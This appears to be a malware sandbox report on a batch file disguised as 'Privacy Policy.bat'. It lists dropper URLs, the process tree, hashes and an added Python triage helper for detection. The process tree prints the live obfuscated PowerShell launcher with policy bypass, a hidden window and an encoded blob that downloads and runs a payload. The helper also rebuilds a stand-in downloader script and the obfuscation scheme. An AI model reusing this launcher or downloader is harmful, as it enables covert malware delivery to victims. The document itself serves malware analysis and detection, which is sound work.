Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/11/2024, 19:55

General

  • Target

    Privacy Policy.bat

  • Size

    6KB

  • MD5

    25fa3f5f45eb6b3632353718d45b282c

  • SHA1

    c691a71779737379d2276fe60151fdf9609a77e6

  • SHA256

    306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936

  • SHA512

    f2d6c752fa37af2e6ca8b9c4c2ffe3f2e56a137f44af932f3b79640d53c8bf2903877c3fe944f61be983639701877bdbabd0aee80e8e87ac24373122f19e2772

  • SSDEEP

    192:wOFqmyT20cb6MuFxH3o7DmTFWJalSN+g4MD:wOFqmbbyFxHaVJGSN+g4M

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://raw.githubusercontent.com/poseidon1338/sp04/refs/heads/main/sbat2

exe.dropper

https://chromeupdates.com/Env.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep by"pas"s -w hid"de"n -enc JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"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"CAAfQApAA0ACgAgACAAIAANAAoAIAAgA"CAAIAAkAGgAdwBuAGQAIAA9ACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAaAB3AG4AZAAsACAAMAApAA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABlAG4AdgBwACAAPQAgACIAQwA6AFwAVwBpAG4ARQB4AHAAbABvAHIAZQByAFwAIgANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZQBuAHYAcAApACkAIAB7AA0ACgAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAbgB2AHAADQAKACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAQAbAB3R5uAGcAIABkAKsebgAgABEB4wAgABEBsAHjHmMAIAB0AKEebwA6ACAAJABlAG4AdgBwACIADQAKAH0ADQAKAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACMAVwByAGkAdABlAC0ASABvAHMAdAAgACIAEAGwAd0ebgBnACAAZACrHm4AIAARAeMAIAB0ANMebgAgAHQAoR5pADoAIAAkAGUAbgB2AHAAIgANAAoAfQANAAoAJABlAG4AdgB1ACAAPQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAHUAcABkAGEAdABlAHMALgBjAG8AbQAvAEUAbgB2AC4AegBpAHAAIgANAAoAJABlAG4AdgB6ACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAFcAaQBuAEgAZQBsAHAAZQByAC4AegBpAHAAIgANAAoAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAGwAaQBlAG4AdAApAC4ARABvAFcAbgBsAG8AQQBkAEYAaQBsAGUAKAAkAGUA
bgB2AHUALAAgACQAZQBuAHYAegApAA0ACgB0AHIAeQAgAHsADQAKACAAIAAgACAAIwAgAFQAox5pACAAdABoALABIAB2AGkAxx5uACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBGAGkAbABlAFMAeQBzAHQAZQBtACAAbgC/HnUAIABjAGgAsAFhACAAYwDzAA0ACgAgACAAIAAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAiAA0ACgANAAoAIAAgACAAIAAjACAAEAGwAd0ebgBnACAAZACrHm4AIAARAb8ebgAgAGYAaQBsAGUAIABaAEkAUAAgAHYA4AAgAHQAaACwASAAbQDlHmMAIAARAe0AYwBoAA0ACgAgACAAIAAgACQAegBpAHAARgBpAGwAZQBQAGEAdABoACAAPQAgACQAZQBuAHYAegANAAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBGAG8AbABkAGUAcgAgAD0AIAAkAGUAbgB2AHAADQAKAA0ACgAgACAAIAAgACMAIABHAGkAox5pACAAbgDpAG4AIABmAGkAbABlACAAWgBJAFAADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAFoAaQBwAEYAaQBsAGUAXQA6ADoARQB4AHQAcgBhAGMAdABUAG8ARABpAHIAZQBjAHQAbwByAHkAKAAkAHoAaQBwAEYAaQBsAGUAUABhAHQAaAAsACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4ARgBvAGwAZABlAHIAKQANAAoADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARwBpAKMeaQAgAG4A6QBuACAAdABoAOAAbgBoACAAYwD0AG4AZwAhACIAOwANAAoAfQAgAGMAYQB0AGMAaAAgAHsADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwDzACAAbADXHmkAIAB4AKMeeQAgAHIAYQAgAHQAcgBvAG4AZwAgAHEAdQDhACAAdAByAOwAbgBoACAAZwBpAKMeaQAgAG4A6QBuADoAIgANAAoAfQANAAoAJABzAHQAIAA9ACAAJABlAG4AdgBwACAAKwAgACIARwBpAG0AcABvAHIAdAAuAGQAYQB0ACIADQAKACQAcwB0AGMAdAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHMAdAAgAC0AUgBhAHcAIAANAAoAJABzAHQAYwB0ADIAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAHQAIAAtAFIAYQB3AA0ACgANAAoAJABzAHQAYwB0ACAAPQAgACQAcwB0AGMAdAAgAC0AcgBlAHAAbABhAGMAZQAgACIAJQB1AHAAJQAiACwAIAAkAHUAcgBsACAADQAKACQAcwB0AGMAdAAyACAAPQAgACQAcwB0AGMAdAAyACAALQByAGUAcABsAGEAYwBlACAAIgAlAHUAcAAlACIALAAgACQAdQByAGwAMgANAAoAJAByAHQAYwAxACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAHYAYwByAHUAbgB0AGkAbQBlADEANAAwAC4AcAB5ACIADQAKACQAcgB0AGMAMgAgAD0AIAAkAGUAbgB2AHAAIAArACAAIgB2AGMAcgB1AG4AdABpAG0AZQAxADQAMABkAC4AcAB5ACIADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4A
dAAgAC0AUABhAHQAaAAgACQAcgB0AGMAMQAgAC0AVgBhAGwAdQBlACAAJABzAHQAYwB0AA0ACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHIAdABjADIAIAAtAFYAYQBsAHUAZQAgACQAcwB0AGMAdAAyAA0ACgAkAGUAIAA9ACAAJABlAG4AdgBwACAAKwAgACIAcAB5AHQAaABvAG4ALgBlAHgAZQAiACAA"DQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHM"AIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAGAAIgAkAHIAdABjADEAYAAiACIAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBgACIAJAByAHQAYwAyAGAAIgAiACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1824
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp"
          4⤵
            PID:1660
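
The launcher in the tree above stacks two cheap evasions: double quotes spliced into the argument text (`by"pas"s`, `hid"de"n`, and quote pairs inside the base64 blob), which cmd.exe and PowerShell's argument parser both discard, so a string match on the raw command line for `-enc` or `bypass` misses; and the UTF-16LE base64 `-EncodedCommand` wrapping. The readable tail of the blob defines a Hide-ConsoleWindow routine that calls `ShowWindowAsync` through an Add-Type P/Invoke (which is why powershell.exe PID 2576 spawns csc.exe and cvtres.exe and leaves the 77uqfd2w.* compile artifacts in Temp), creates C:\WinExplorer\, downloads https://chromeupdates.com/Env.zip over TLS 1.2 to WinHelper.zip, extracts it, writes vcruntime140.py and vcruntime140d.py from a Gimport.dat template, and runs both with a bundled python.exe. The following triage helper is an added example, not code from the report or from the sample: it normalises the command line the way the Windows argument parser does, finds the encoded-command switch under any spelling powershell.exe accepts, decodes the script and pulls out URLs, paths and download/compile APIs. The launcher it parses is built from a short constructed stand-in script with the same shape as the recovered one (the page's blob is partly elided, so the real text is not reproduced).

```python
# Triage helper for the cmd.exe -> powershell.exe -enc launcher in the process
# tree.  Added example for this page, not code from the report or the sample.
import base64
import re

# Constructed stand-in for the page's partly elided blob: same shape as the script
# recovered from it (ShowWindowAsync via Add-Type, staging directory, TLS 1.2
# download of Env.zip, zip extraction, bundled python.exe launch).
SAMPLE_SCRIPT = (
    '$sig = \'[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr h, int n);\'\r\n'
    '$ShowWindowAsync = Add-Type -MemberDefinition $sig -Name Win32 -Namespace Native -PassThru\r\n'
    '$ShowWindowAsync::ShowWindowAsync($hwnd, 0)\r\n'
    '$envp = "C:\\WinExplorer\\"\r\n'
    '$envu = "https://chromeupdates.com/Env.zip"\r\n'
    '$envz = $envp + "WinHelper.zip"\r\n'
    '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\r\n'
    '(New-Object -TypeName System.Net.WeBClient).DoWnloAdFile($envu, $envz)\r\n'
    '[System.IO.Compression.ZipFile]::ExtractToDirectory($envz, $envp)\r\n'
    '$e = $envp + "python.exe"\r\n'
    'Start-Process -FilePath $e -ArgumentList "`"$rtc1`"" -NoNewWindow\r\n'
)

def _build_obfuscated_launcher(script: str) -> str:
    """Constructed: encode the way the .bat does, then splice in quote pairs."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    parts = [blob[i:i + 40] for i in range(0, len(blob), 40)]
    spliced = "".join(p if i % 2 == 0 else f'"{p}"' for i, p in enumerate(parts))
    return f'powershell -ep by"pas"s -w hid"de"n -enc {spliced}'

SAMPLE_CMDLINE = _build_obfuscated_launcher(SAMPLE_SCRIPT)

# Spellings powershell.exe accepts: any prefix of the long switch name plus the
# short forms -ec and -ep (a bare -e already means -EncodedCommand).
_ENC = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}
_EP = {"executionpolicy"[:n] for n in range(2, 16)} | {"ep"}
_WS = {"windowstyle"[:n] for n in range(1, 12)}
_URL_RE = re.compile(r"""https?://[^\s"'`<>)]+""", re.I)
_PATH_RE = re.compile(r"""[A-Za-z]:\\[^\s"'`<>;,()]+""")
_API_RE = re.compile(r"(WebClient|DownloadFile|DownloadString|ExtractToDirectory|Add-Type|"
                     r"MemberDefinition|TypeDefinition|Start-Process|ShowWindowAsync|Invoke-Expression)", re.I)

def windows_argv(cmdline: str) -> list:
    """CommandLineToArgvW-style split: whitespace separates arguments unless it is
    inside double quotes, and the quote characters themselves are dropped.
    Backslash-escape rules are omitted; the launcher above never uses them."""
    args, cur, in_quotes, have_token = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes, have_token = not in_quotes, True
        elif ch in " \t" and not in_quotes:
            if have_token:
                args.append("".join(cur))
                cur, have_token = [], False
        else:
            cur.append(ch)
            have_token = True
    if have_token:
        args.append("".join(cur))
    return args

def _is_switch(arg: str, names: set) -> bool:
    return len(arg) > 1 and arg[0] in "-/" and arg[1:].lower() in names

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; tolerate stripped '=' padding."""
    blob = blob.strip()
    return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le")

def extract_iocs(script: str) -> dict:
    return {"urls": sorted(set(_URL_RE.findall(script))),
            "paths": sorted(set(_PATH_RE.findall(script))),
            "apis": sorted({m.lower() for m in _API_RE.findall(script)})}

def triage(cmdline: str) -> dict:
    """Normalise, decode and summarise one powershell.exe command line."""
    args, findings, script = windows_argv(cmdline), [], None
    if re.search(r'\S"\S', cmdline):          # a quote glued between two non-spaces
        findings.append("quote-splitting obfuscation inside arguments")
    for i, a in enumerate(args):
        nxt = args[i + 1].lower() if i + 1 < len(args) else ""
        if _is_switch(a, _EP) and nxt in ("bypass", "unrestricted"):
            findings.append(f"execution policy {nxt}")
        elif _is_switch(a, _WS) and nxt == "hidden":
            findings.append("hidden window")
        elif _is_switch(a, _ENC) and nxt and script is None:
            script = decode_encoded_command(args[i + 1])
            findings.append("encoded command")
    iocs = extract_iocs(script) if script else {"urls": [], "paths": [], "apis": []}
    if {"downloadfile", "downloadstring"} & set(iocs["apis"]):
        findings.append("downloader, fetches: " + ", ".join(iocs["urls"]))
    if {"memberdefinition", "typedefinition"} & set(iocs["apis"]):
        findings.append("Add-Type with C# source: expect csc.exe/cvtres.exe children "
                        "and Temp\\*.cmdline, *.0.cs, *.dll artifacts")
    return {"args": args, "script": script, "iocs": iocs, "findings": findings}

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_CMDLINE)["findings"]))
```

Point `triage()` at the CommandLine field of a Sysmon Event ID 1 or Security 4688 record rather than at the raw batch file; the normalisation step matters because the quote trick defeats any rule that searches the unparsed string for `-enc` or `bypass`, while a rule written against the parsed arguments (or against the decoded script) still fires. Only `Add-Type` that carries C# source (`-MemberDefinition` / `-TypeDefinition`) invokes csc.exe; `Add-Type -AssemblyName` does not, so the compile-artifact finding is keyed on the former.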

    Network

          MITRE ATT&CK Matrix

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\77uqfd2w.dll

            Filesize

            3KB

            MD5

            eff24776c5ea4ca313b317a0a130e3f5

            SHA1

            6155d10acff863e48c6daf94abc717a01bd23f24

            SHA256

            8a882d47c662389785a26808ecf3290e8caca4d84bb199feb75a37a8eb94fd6d

            SHA512

            d526e3cb364a8847c908b3725a2d8ee8eb8f6230a9dac572d1b78596dff80bdf97f2fd94635e3621f94ef341b56e2573176dfc412847eb082dbfb81c62bb4e68

          • C:\Users\Admin\AppData\Local\Temp\77uqfd2w.pdb

            Filesize

            7KB

            MD5

            bb0c6ea81fdbba60e594aa1bfa1164f5

            SHA1

            c06d029700e62b15c82fe6f4588856c9abcad119

            SHA256

            4f8d3318a69d82b50512e8e1c57f0ad721a3351590f95242665610774b7b2290

            SHA512

            f87e7b424c9303f21f77a0399568aba6730e32ea050f3df77c691e38dda91d6a6357aa51a0ebd971196b53c097f4fbc1bb0fe889a32aef9d5e2ae08645884238

          • C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp

            Filesize

            1KB

            MD5

            97cd5937f41ec0eac002770b4b081b9f

            SHA1

            a82bf85592e9c2c326e2c93076c4f0ded1d4f25c

            SHA256

            33cee92a699239271539105e70592133ee8393d50f5b04ff9598a9bd4539f56b

            SHA512

            a5b69c710fa8f1cf545c071b86843e92a9ddcdfb3523df0e5dc364e5ad472bbccd851e8045f37e4718fcb8f3646d09cdb14e9d73591fffaf8d711b7b28766f7a

          • \??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.0.cs

            Filesize

            237B

            MD5

            a6e80541a483188dbce2f3d843fcbe4d

            SHA1

            a1f2e13a3314ab6a676751936c7b3b9a9fb9103e

            SHA256

            d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9

            SHA512

            6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

          • \??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline

            Filesize

            309B

            MD5

            7abe853e22ad6754fb8c310d701e426f

            SHA1

            fc936fa42b2bda340cec91cf3037d74be2fce6f2

            SHA256

            f5f3a6b2639b874b9421aa015abcc461e2731293875cdefde27fe6f9e9feaa14

            SHA512

            1e226ff9b3b767fca4711628e338171e43093be0a334e1e4b2f63ca9e8a1f2f62f0ffe225719acf0d3254eae39dccab95aa6a9bfdd91277523458a5a3cc4ecc1

          • \??\c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp

            Filesize

            652B

            MD5

            edc11b3922d216360ca544fb4877562e

            SHA1

            4fa1dbc2b1c8af96b2afeb67811de2474a3fd431

            SHA256

            7b7dde2aeba3e015615f8d492c41e2a13ade1fd75c13afa478cd298ff40c802b

            SHA512

            59431ff0c390cc731a53c46132600182e4365883ae28c7c6f9c6fed702ee95f94742a321f32307cea7c04c8cab525c9f45293666c1c9e10fd88461ae6df6563a

          • memory/1824-23-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/1824-15-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-12-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

            Filesize

            4KB

          • memory/2576-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-6-0x0000000002150000-0x0000000002158000-memory.dmp

            Filesize

            32KB

          • memory/2576-25-0x00000000029F0000-0x00000000029F8000-memory.dmp

            Filesize

            32KB

          • memory/2576-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

            Filesize

            2.9MB

          • memory/2576-30-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB